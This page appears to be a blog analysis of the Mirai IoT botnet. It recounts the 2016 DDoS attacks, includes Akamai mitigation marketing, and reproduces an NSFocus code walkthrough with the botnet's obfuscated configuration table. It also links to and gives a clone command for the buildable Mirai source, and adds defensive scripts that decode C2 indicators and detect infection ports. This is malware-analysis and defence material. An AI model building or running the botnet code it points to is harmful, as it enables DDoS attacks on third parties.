
Mirai BotNet

Analysing the Mirai source code

The Mirai source code (build your own)

Check out GitHub to get the source code of the Mirai botnet, or use the cloned version from my site.

Another way would be to clone it to your machine with:

git clone https://github.com/jgamblin/Mirai-Source-Code.git

The documentation about install and use can be found here.

Also needed is this SQL file containing the statements to create the DB.

Describing the effect of a massive DDOS

As per WiKi

Mirai was used in the DDoS attack on 20 September 2016 on the Krebs on Security site which reached 620 Gbps.[11] Ars Technica also reported a 1 Tbps attack on French web host OVH.[2]

On 21 October 2016 multiple major DDoS attacks in DNS services of DNS service provider Dyn occurred using Mirai malware installed on a large number of IoT devices, resulting in the inaccessibility of several high profile websites such as GitHub, Twitter, Reddit, Netflix, Airbnb and many others.[12] The attribution of the attack to the Mirai botnet was originally reported by BackConnect, a security firm.[13]

Staff at Deep Learning Security observed the steady growth of Mirai botnets before and after the 21 October attack.[14]

Check out Brian Krebs' article as well, as he was one of the first victims.

Hackforums Shutters Booter Service Bazaar

 

The enabler of Mirai - the IoT passwords

The abused "bots" were a quite large range of "dumb" devices reachable from the Internet with default passwords. This way, the attacker could plant his malicious code on the device and turn it into his personal slave.

The key to achieving this were the still untouched default passwords of the devices.

Stephen Ragan has written a nice article about that and listed the passwords/accounts used.

DDoS mitigation (Akamai Kona Site Defender)

To my knowledge there is no real solution to defend against a really big DDoS attack.
Even large Internet bandwidth (like Akamai, Google, Dyn, etc.) is filled up at a certain amount of requests. If you are trying to fight against a 1.7 Tbit/s DDoS attack, you're out of luck.

Anyway, there are several approaches to overcome a DDoS attack by adding more bandwidth. Akamai's "Kona Site Defender" is just an example.

Check the original article from Akamai here:

With distributed denial of service (DDoS) attacks a continuing threat to websites, networks and servers, DDoS mitigation is high on the priority list for enterprise security teams. DDoS attacks are perpetrated by hackers who remotely control computer "bots" – systems that have been taken over via malware. By directing hundreds of thousands of these hijacked computers to send requests to a single target, a DDoS attack floods a website or application with an overwhelming amount of traffic, causing the target servers to respond very slowly or to crash.

While DDoS attacks are one of the older forms of cyber threats, DDoS mitigation today is harder than ever. DDoS perpetrators have changed their focus from the transport and network layers to the application layer where DDoS protection is more difficult. Methods of attack have grown more sophisticated, too – the volume of requests sent to a target has multiplied exponentially in recent DDoS attacks, and most enterprise IT security programs are unable to scale to achieve adequate DDoS mitigation. DDoS attacks are also used to mask other forms of data breaches. For these reasons, many leading enterprises have turned to DDoS mitigation solutions from Akamai.

DDoS mitigation with Akamai

Akamai provides DDoS mitigation solutions for some of the world's biggest brands – the companies who understand that any degradation or denial of service can do lasting damage to revenue, reputation and customer loyalty.

Akamai Kona Site Defender is a multi-layered DDoS mitigation solution that provides unmatched web and application protection delivered through an intelligent platform with more than 137,000 servers in more than 87 countries. Without diminishing web performance or availability, Kona Site Defender extends security beyond the data center and can detect, identify and mitigate DDoS attacks before they reach the origin.

This powerful Akamai DDoS mitigation solution deflects network-layer DDoS traffic and absorbs application-layer DDoS traffic at the network edge. Mitigation capabilities are implemented natively in-path to fend off attacks in the cloud before they can reach the customer origin. A highly scalable Web Application Firewall (WAF) provides additional protection against application-layer attacks in HTTP and HTTPS traffic.

Benefits of Kona Site Defender for DDoS mitigation

With Akamai Kona Site Defender, enterprises can:

  • Reduce downtime and minimize business risk with a DDoS mitigation solution that can deflect and absorb the largest DDoS attacks.
  • Maintain web site and application performance throughout attacks with Akamai's globally distributed architecture.
  • Minimize costs associated with web security.
  • Protect against new and evolving threats by relying on Kona Rules, which are regularly updated by Akamai's Threat Intelligence Team.
  • Reduce the risk of data theft with Akamai Web Application Firewall.

The Mirai analysis

The excellent article below can be found here: http://blog.nsfocus.net/mirai-source-code-analysis-report
I just allowed myself to extend it here and there with my own comments and conclusions.

Code Structure

As shown in Figure 1, there are two folders. The loader folder, as its name implies, is a loader that creates servers and monitors the status of connections. The mirai folder implements major malicious functions, including such tool implementations as establishing network connections, executing DDoS attacks, and downloading data, and operations from the main control terminal.

Infection Path

Attackers can use an SSH or Telnet account and default passwords to compromise Internet of Things (IoT) devices.

Function Implementation

The source code reveals that the following malicious functions can be implemented:

  • bot folder: performs such operations as anti-debugging, hiding of its own process, configuration of initial port numbers for domain names, configuration of default weak passwords, establishment of network connections, and DDoS execution.
  • tools folder: performs tool-based operations such as wget, file updating, and XOR operations.
  • cnc folder: monitors the successfully infected bots from the main control terminal, parses instructions as a receiver, and launches DDoS attacks.

When implementing functions, the code in the bot folder opens PF_INET (TCP raw socket for UNIX networks) and binds it to TCP port 48101 at the local host IP address of 127.0.0.1. Then it can listen for incoming connections. When one device on a network is infected, the infection will spread to other devices on the same network via the Telnet service.

bot Folder

In terms of functionality, the code in the bot folder can perform the following operations:

Anti-GDB debugging, CC address parsing, establishment of network connections, and DDoS execution.

static void anti_gdb_entry(int);            // Anti-GDB debugging.
static void resolve_cnc_addr(void);         // Parses CC addresses.
static void establish_connection(void);     // Establishes network connections.
static void teardown_connection(void);      // Tears down network connections.
static void ensure_single_instance(void);   // Ensures that only one instance is running each time (deletes the existing process when detecting a new instance running).
static BOOL unlock_tbl_if_nodebug(char *);  // Initializes various tables (including the list of connected domain names and port numbers and that of user names and passwords).

If detecting GDB debugging, the program deletes its own execution file, prevents the watchdog from restarting the device, and prompts a CC address connection failure.

To ensure that each time only one instance is running (by connecting to the local port 48101) and kill the process corresponding to port 48101:

To hide the process:

To initialize attack type parameters and provide various attack types (UDP, VSE, DNS, SYN, and other DDoS attack types) for attackers to choose:

To initialize port settings by shutting down ports to terminate other processes that use Telnet, SSH, and HTTP services and prevent them from restarting:

To initialize scanning parameters and scan other devices on the LAN with weak passwords and with port 23 opened:
The excluded IP ranges are interesting, especially the ones the author obviously doesn't want to mess with. ;-)

The cryptographic algorithm for user names and passwords is as follows:

When detecting a new instance running, the program kills its own process and stops scanning and all attack tasks.

Connected Domain Names and Port Numbers

The connected domain names and port numbers are hardcoded into source code. In this case, domain name strings can be decrypted by using the algorithm shown in enc.c in the tools folder.

void table_init(void)
{
add_entry(TABLE_CNC_DOMAIN, "\x41\x4C\x41\x0C\x41\x4A\x43\x4C\x45\x47\x4F\x47\x0C\x41\x4D\x4F\x22", 30); // cnc.changeme.com
add_entry(TABLE_CNC_PORT, "\x22\x35", 2);   // 23
add_entry(TABLE_SCAN_CB_DOMAIN, "\x50\x47\x52\x4D\x50\x56\x0C\x41\x4A\x43\x4C\x45\x47\x4F\x47\x0C\x41\x4D\x4F\x22", 29); // report.changeme.com
add_entry(TABLE_SCAN_CB_PORT, "\x99\xC7", 2);         // 48101
add_entry(TABLE_EXEC_SUCCESS, "\x4E\x4B\x51\x56\x47\x4C\x4B\x4C\x45\x02\x56\x57\x4C\x12\x22", 15);    // listening tun0
add_entry(TABLE_KILLER_SAFE, "\x4A\x56\x56\x52\x51\x18\x0D\x0D\x5B\x4D\x57\x56\x57\x0C\x40\x47\x0D\x46\x73\x55\x16\x55\x1B\x75\x45\x7A\x41\x73\x22", 29);    // safe string https://youtu.be/dQw4w9WgXcQ
add_entry(TABLE_KILLER_PROC, "\x0D\x52\x50\x4D\x41\x0D\x22", 7);    
add_entry(TABLE_KILLER_EXE, "\x0D\x47\x5A\x47\x22", 5);    
add_entry(TABLE_KILLER_DELETED, "\x02\x0A\x46\x47\x4E\x47\x56\x47\x46\x0B\x22", 11);    
add_entry(TABLE_KILLER_FD, "\x0D\x44\x46\x22", 4);    
add_entry(TABLE_KILLER_ANIME, "\x0C\x43\x4C\x4B\x4F\x47\x22", 7);    
add_entry(TABLE_KILLER_STATUS, "\x0D\x51\x56\x43\x56\x57\x51\x22", 8);    
add_entry(TABLE_MEM_QBOT, "\x70\x67\x72\x6D\x70\x76\x02\x07\x51\x18\x07\x51\x22", 13);    
add_entry(TABLE_MEM_QBOT2, "\x6A\x76\x76\x72\x64\x6E\x6D\x6D\x66\x22", 10);    
add_entry(TABLE_MEM_QBOT3, "\x6E\x6D\x6E\x6C\x6D\x65\x76\x64\x6D\x22", 10);    
add_entry(TABLE_MEM_UPX, "\x7E\x5A\x17\x1A\x7E\x5A\x16\x66\x7E\x5A\x16\x67\x7E\x5A\x16\x67\x7E\x5A\x16\x11\x7E\x5A\x17\x12\x7E\x5A\x16\x14\x7E\x5A\x10\x10\x22", 33);    
add_entry(TABLE_MEM_ZOLLARD, "\x58\x4D\x4E\x4E\x43\x50\x46\x22", 8);    
add_entry(TABLE_MEM_REMAITEN, "\x65\x67\x76\x6E\x6D\x61\x63\x6E\x6B\x72\x22", 11);    
add_entry(TABLE_SCAN_SHELL, "\x51\x4A\x47\x4E\x4E\x22", 6);    
add_entry(TABLE_SCAN_ENABLE, "\x47\x4C\x43\x40\x4E\x47\x22", 7);    
add_entry(TABLE_SCAN_SYSTEM, "\x51\x5B\x51\x56\x47\x4F\x22", 7);    
add_entry(TABLE_SCAN_SH, "\x51\x4A\x22", 3);    
add_entry(TABLE_SCAN_QUERY, "\x0D\x40\x4B\x4C\x0D\x40\x57\x51\x5B\x40\x4D\x5A\x02\x6F\x6B\x70\x63\x6B\x22", 19);    
add_entry(TABLE_SCAN_RESP, "\x6F\x6B\x70\x63\x6B\x18\x02\x43\x52\x52\x4E\x47\x56\x02\x4C\x4D\x56\x02\x44\x4D\x57\x4C\x46\x22", 24);    
add_entry(TABLE_SCAN_NCORRECT, "\x4C\x41\x4D\x50\x50\x47\x41\x56\x22", 9);    
add_entry(TABLE_SCAN_PS, "\x0D\x40\x4B\x4C\x0D\x40\x57\x51\x5B\x40\x4D\x5A\x02\x52\x51\x22", 16);    
add_entry(TABLE_SCAN_KILL_9, "\x0D\x40\x4B\x4C\x0D\x40\x57\x51\x5B\x40\x4D\x5A\x02\x49\x4B\x4E\x4E\x02\x0F\x1B\x02\x22", 22);    
add_entry(TABLE_ATK_VSE, "\x76\x71\x4D\x57\x50\x41\x47\x02\x67\x4C\x45\x4B\x4C\x47\x02\x73\x57\x47\x50\x5B\x22", 21);    
add_entry(TABLE_ATK_RESOLVER, "\x0D\x47\x56\x41\x0D\x50\x47\x51\x4D\x4E\x54\x0C\x41\x4D\x4C\x44\x22", 17);    
add_entry(TABLE_ATK_NSERV, "\x4C\x43\x4F\x47\x51\x47\x50\x54\x47\x50\x02\x22", 12);    
add_entry(TABLE_ATK_KEEP_ALIVE, "\x61\x4D\x4C\x4C\x47\x41\x56\x4B\x4D\x4C\x18\x02\x49\x47\x47\x52\x0F\x43\x4E\x4B\x54\x47\x22", 23);    
add_entry(TABLE_ATK_ACCEPT, "\x63\x41\x41\x47\x52\x56\x18\x02\x56\x47\x5A\x56\x0D\x4A\x56\x4F\x4E\x0E\x43\x52\x52\x4E\x4B\x41\x43\x56\x4B\x4D\x4C\x0D\x5A\x4A\x56\x4F\x4E\x09\x5A\x4F\x4E\x0E\x43\x52\x52\x4E\x4B\x41\x43\x56\x4B\x4D\x4C\x0D\x5A\x4F\x4E\x19\x53\x1F\x12\x0C\x1B\x0E\x4B\x4F\x43\x45\x47\x0D\x55\x47\x40\x52\x0E\x08\x0D\x08\x19\x53\x1F\x12\x0C\x1A\x22", 83);    
add_entry(TABLE_ATK_ACCEPT_LNG, "\x63\x41\x41\x47\x52\x56\x0F\x6E\x43\x4C\x45\x57\x43\x45\x47\x18\x02\x47\x4C\x0F\x77\x71\x0E\x47\x4C\x19\x53\x1F\x12\x0C\x1A\x22", 32);    
add_entry(TABLE_ATK_CONTENT_TYPE, "\x61\x4D\x4C\x56\x47\x4C\x56\x0F\x76\x5B\x52\x47\x18\x02\x43\x52\x52\x4E\x4B\x41\x43\x56\x4B\x4D\x4C\x0D\x5A\x0F\x55\x55\x55\x0F\x44\x4D\x50\x4F\x0F\x57\x50\x4E\x47\x4C\x41\x4D\x46\x47\x46\x22", 48);    
add_entry(TABLE_ATK_SET_COOKIE, "\x51\x47\x56\x61\x4D\x4D\x49\x4B\x47\x0A\x05\x22", 12);    
add_entry(TABLE_ATK_REFRESH_HDR, "\x50\x47\x44\x50\x47\x51\x4A\x18\x22", 9);    
add_entry(TABLE_ATK_LOCATION_HDR, "\x4E\x4D\x41\x43\x56\x4B\x4D\x4C\x18\x22", 10);    
add_entry(TABLE_ATK_SET_COOKIE_HDR, "\x51\x47\x56\x0F\x41\x4D\x4D\x49\x4B\x47\x18\x22", 12);    
add_entry(TABLE_ATK_CONTENT_LENGTH_HDR, "\x41\x4D\x4C\x56\x47\x4C\x56\x0F\x4E\x47\x4C\x45\x56\x4A\x18\x22", 16);    
add_entry(TABLE_ATK_TRANSFER_ENCODING_HDR, "\x56\x50\x43\x4C\x51\x44\x47\x50\x0F\x47\x4C\x41\x4D\x46\x4B\x4C\x45\x18\x22", 19);    
add_entry(TABLE_ATK_CHUNKED, "\x41\x4A\x57\x4C\x49\x47\x46\x22", 8);    
add_entry(TABLE_ATK_KEEP_ALIVE_HDR, "\x49\x47\x47\x52\x0F\x43\x4E\x4B\x54\x47\x22", 11);    
add_entry(TABLE_ATK_CONNECTION_HDR, "\x41\x4D\x4C\x4C\x47\x41\x56\x4B\x4D\x4C\x18\x22", 12);    
add_entry(TABLE_ATK_DOSARREST, "\x51\x47\x50\x54\x47\x50\x18\x02\x46\x4D\x51\x43\x50\x50\x47\x51\x56\x22", 18);    
add_entry(TABLE_ATK_CLOUDFLARE_NGINX, "\x51\x47\x50\x54\x47\x50\x18\x02\x41\x4E\x4D\x57\x46\x44\x4E\x43\x50\x47\x0F\x4C\x45\x4B\x4C\x5A\x22", 25);     
add_entry(TABLE_HTTP_ONE, "\x6F\x4D\x58\x4B\x4E\x4E\x43\x0D\x17\x0C\x12\x02\x0A\x75\x4B\x4C\x46\x4D\x55\x51\x02\x6C\x76\x02\x13\x12\x0C\x12\x19\x02\x75\x6D\x75\x14\x16\x0B\x02\x63\x52\x52\x4E\x47\x75\x47\x40\x69\x4B\x56\x0D\x17\x11\x15\x0C\x11\x14\x02\x0A\x69\x6A\x76\x6F\x6E\x0E\x02\x4E\x4B\x49\x47\x02\x65\x47\x41\x49\x4D\x0B\x02\x61\x4A\x50\x4D\x4F\x47\x0D\x17\x13\x0C\x12\x0C\x10\x15\x12\x16\x0C\x13\x12\x11\x02\x71\x43\x44\x43\x50\x4B\x0D\x17\x11\x15\x0C\x11\x14\x22", 111);    
add_entry(TABLE_HTTP_TWO, "\x6F\x4D\x58\x4B\x4E\x4E\x43\x0D\x17\x0C\x12\x02\x0A\x75\x4B\x4C\x46\x4D\x55\x51\x02\x6C\x76\x02\x13\x12\x0C\x12\x19\x02\x75\x6D\x75\x14\x16\x0B\x02\x63\x52\x52\x4E\x47\x75\x47\x40\x69\x4B\x56\x0D\x17\x11\x15\x0C\x11\x14\x02\x0A\x69\x6A\x76\x6F\x6E\x0E\x02\x4E\x4B\x49\x47\x02\x65\x47\x41\x49\x4D\x0B\x02\x61\x4A\x50\x4D\x4F\x47\x0D\x17\x10\x0C\x12\x0C\x10\x15\x16\x11\x0C\x13\x13\x14\x02\x71\x43\x44\x43\x50\x4B\x0D\x17\x11\x15\x0C\x11\x14\x22", 111);    
add_entry(TABLE_HTTP_THREE, "\x6F\x4D\x58\x4B\x4E\x4E\x43\x0D\x17\x0C\x12\x02\x0A\x75\x4B\x4C\x46\x4D\x55\x51\x02\x6C\x76\x02\x14\x0C\x13\x19\x02\x75\x6D\x75\x14\x16\x0B\x02\x63\x52\x52\x4E\x47\x75\x47\x40\x69\x4B\x56\x0D\x17\x11\x15\x0C\x11\x14\x02\x0A\x69\x6A\x76\x6F\x6E\x0E\x02\x4E\x4B\x49\x47\x02\x65\x47\x41\x49\x4D\x0B\x02\x61\x4A\x50\x4D\x4F\x47\x0D\x17\x13\x0C\x12\x0C\x10\x15\x12\x16\x0C\x13\x12\x11\x02\x71\x43\x44\x43\x50\x4B\x0D\x17\x11\x15\x0C\x11\x14\x22", 110);    
add_entry(TABLE_HTTP_FOUR, "\x6F\x4D\x58\x4B\x4E\x4E\x43\x0D\x17\x0C\x12\x02\x0A\x75\x4B\x4C\x46\x4D\x55\x51\x02\x6C\x76\x02\x14\x0C\x13\x19\x02\x75\x6D\x75\x14\x16\x0B\x02\x63\x52\x52\x4E\x47\x75\x47\x40\x69\x4B\x56\x0D\x17\x11\x15\x0C\x11\x14\x02\x0A\x69\x6A\x76\x6F\x6E\x0E\x02\x4E\x4B\x49\x47\x02\x65\x47\x41\x49\x4D\x0B\x02\x61\x4A\x50\x4D\x4F\x47\x0D\x17\x10\x0C\x12\x0C\x10\x15\x16\x11\x0C\x13\x13\x14\x02\x71\x43\x44\x43\x50\x4B\x0D\x17\x11\x15\x0C\x11\x14\x22", 110);    
add_entry(TABLE_HTTP_FIVE, "\x6F\x4D\x58\x4B\x4E\x4E\x43\x0D\x17\x0C\x12\x02\x0A\x6F\x43\x41\x4B\x4C\x56\x4D\x51\x4A\x19\x02\x6B\x4C\x56\x47\x4E\x02\x6F\x43\x41\x02\x6D\x71\x02\x7A\x02\x13\x12\x7D\x13\x13\x7D\x14\x0B\x02\x63\x52\x52\x4E\x47\x75\x47\x40\x69\x4B\x56\x0D\x14\x12\x13\x0C\x15\x0C\x15\x02\x0A\x69\x6A\x76\x6F\x6E\x0E\x02\x4E\x4B\x49\x47\x02\x65\x47\x41\x49\x4D\x0B\x02\x74\x47\x50\x51\x4B\x4D\x4C\x0D\x1B\x0C\x13\x0C\x10\x02\x71\x43\x44\x43\x50\x4B\x0D\x14\x12\x13\x0C\x15\x0C\x15\x22", 117);
}
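As an added example (my own Python, not code from the NSFocus article or the Mirai repository), here is a decoder for the table entries listed above, the kind of thing an analyst runs on a sample to pull out the C2 host and ports to block or alert on. It assumes the key table.c ships with (0xdeadbeef, whose four bytes XOR down to the single byte 0x22) and, going one step beyond the page, recovers that byte from the entry's own NUL terminator so it also works on rebuilt variants whose operators changed the key.

```python
import struct

TABLE_KEY = 0xDEADBEEF  # key hard-coded in Mirai's table.c (assumed stock build)

def effective_xor_byte(key: int = TABLE_KEY) -> int:
    """toggle_obf() XORs each byte with k1..k4 in turn, which collapses to one byte."""
    k1, k2, k3, k4 = key & 0xFF, (key >> 8) & 0xFF, (key >> 16) & 0xFF, key >> 24
    return k1 ^ k2 ^ k3 ^ k4  # 0xEF ^ 0xBE ^ 0xAD ^ 0xDE == 0x22

def recover_xor_byte(blob: bytes) -> int:
    """Derive the key byte from a string entry without knowing the key: the
    last stored byte is the encoded NUL terminator, so it *is* the key byte.
    Useful for rebuilt variants whose operators changed TABLE_KEY."""
    x = blob[-1]
    if not all(0x20 <= (b ^ x) < 0x7F for b in blob[:-1]):
        raise ValueError("not a printable string entry under a single XOR byte")
    return x

def decode_string(blob: bytes, xor: int = effective_xor_byte()) -> str:
    """Decode a string entry and drop the NUL terminator."""
    plain = bytes(b ^ xor for b in blob)
    return plain.split(b"\x00", 1)[0].decode("ascii")

def decode_port(blob: bytes, xor: int = effective_xor_byte()) -> int:
    """Port entries are a 2-byte network-order integer, not a string."""
    return struct.unpack(">H", bytes(b ^ xor for b in blob))[0]

# Entries copied from the table_init() listing above.
CNC_DOMAIN = b"\x41\x4C\x41\x0C\x41\x4A\x43\x4C\x45\x47\x4F\x47\x0C\x41\x4D\x4F\x22"
CNC_PORT = b"\x22\x35"
SCAN_CB_PORT = b"\x99\xC7"
EXEC_SUCCESS = b"\x4E\x4B\x51\x56\x47\x4C\x4B\x4C\x45\x02\x56\x57\x4C\x12\x22"

def extract_c2_config() -> dict:
    """The values a defender wants from a sample: C2 host/port, the scanner
    report-back port, and the startup string the bot prints on success."""
    xor = recover_xor_byte(CNC_DOMAIN)  # 0x22 for the stock key
    return {
        "cnc_domain": decode_string(CNC_DOMAIN, xor),
        "cnc_port": decode_port(CNC_PORT, xor),
        "scan_cb_port": decode_port(SCAN_CB_PORT, xor),
        "exec_success": decode_string(EXEC_SUCCESS, xor),
    }

if __name__ == "__main__":
    for name, value in extract_c2_config().items():
        print(f"{name:13} {value}")
```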

The target is devices that use busybox.

DDoS Attack Methods

User Name and Password Configuration

cnc Folder

The code in this folder listens on ports 23 and 101 and performs different operations accordingly from the main control terminal.

When listening for port 23, the program determines what to do next based on the received data. If the received data contains 4 bytes, which are 00 00 00 x (x > 0), the program determines that such data is from a bot and adds the related host as a new bot. Otherwise, the program finds out whether access with an admin account is allowed. After successful login, an attacker can create admin accounts and configure bots and bot hosts by using different commands.

When port 101 is involved, the program parses the received information to obtain commands for launching a new round of attack. Attacks that can be launched include UDP, DNS, SYN, ACK, STOMP, GRE IP, GRE Ethernet, and HTTP floods and Valve Source Engine (VSE) specific floods.

tools Folder

Single_Load.c That Loads Files

Execution result:

Wget.c That Obtains Remote Files

Execution result:

Nogdb.c That Updates File Information

Execution result:

Badbot.c That Displays Information of a Specified Bot

Enc.c

Usage: %s <string | ip | uint32 | uint16 | uint8 | bool> <data>

loader Folder

The code in this folder serves to create a server and monitor the status of connections.

Workarounds

Mirai mainly targets devices with Linux as the operating system and busybox installed. To protect against this malware, we recommend the following workarounds:

  1. Enhance security of user names and passwords by changing initial passwords and weak passwords.
  2. Disable port 48101.
  3. Disable Telnet connections that use port 23.
  4. Restrict the use of busybox to specific users.
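To check workarounds 2 and 3 on a device, here is an added Python example of my own (not from the NSFocus article or the Mirai source) that reads the kernel's /proc/net/tcp table and flags a listener on the 48101 single-instance port or an exposed Telnet listener on port 23. It assumes a little-endian host (x86 and the usual ARM/MIPS little-endian IoT boards), which is the byte order the kernel uses when printing the hex addresses in that table; the sample table is constructed.

```python
import socket
import struct

MIRAI_SINGLE_INSTANCE_PORT = 48101  # bind used by ensure_single_instance()
TELNET_PORT = 23                    # infection vector, and one of the ports the bot kills
TCP_LISTEN = 0x0A                   # value of the "st" column for LISTEN

def _hex_addr(field: str):
    """Turn '0100007F:BBE5' into ('127.0.0.1', 48101). The kernel prints the
    IPv4 address in host byte order, so this assumes a little-endian host."""
    ip_hex, port_hex = field.split(":")
    ip = socket.inet_ntoa(struct.pack("<I", int(ip_hex, 16)))
    return ip, int(port_hex, 16)

def parse_proc_net_tcp(text: str):
    """Return (local_ip, local_port, state) per socket row, skipping the header."""
    rows = []
    for line in text.splitlines()[1:]:
        cols = line.split()
        if len(cols) < 4:
            continue
        ip, port = _hex_addr(cols[1])
        rows.append((ip, port, int(cols[3], 16)))
    return rows

def find_mirai_indicators(rows):
    """Human-readable findings for the listeners the analysis calls out; [] if clean."""
    findings = []
    for ip, port, state in rows:
        if state != TCP_LISTEN:
            continue
        if port == MIRAI_SINGLE_INSTANCE_PORT:
            findings.append(f"LISTEN on {ip}:{port}: Mirai single-instance lock port")
        elif port == TELNET_PORT:
            findings.append(f"LISTEN on {ip}:{port}: Telnet exposed (Mirai infection vector)")
    return findings

# Constructed sample: Telnet on all interfaces, the 48101 lock on loopback,
# and an SSH listener on 22 that must not be flagged.
SAMPLE_PROC_NET_TCP = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 00000000:0017 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 1001 1 0 100 0 0 10 0
   1: 0100007F:BBE5 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 1002 1 0 100 0 0 10 0
   2: 00000000:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 1003 1 0 100 0 0 10 0
"""

def scan_sample():
    return find_mirai_indicators(parse_proc_net_tcp(SAMPLE_PROC_NET_TCP))

if __name__ == "__main__":
    try:
        text = open("/proc/net/tcp").read()  # live table when run on a Linux host
    except OSError:
        text = SAMPLE_PROC_NET_TCP
    print("\n".join(find_mirai_indicators(parse_proc_net_tcp(text))) or "no Mirai listener indicators")
```

A hit on 48101 is only a strong hint, since any process could bind that port; confirm by identifying the owning process before acting on it.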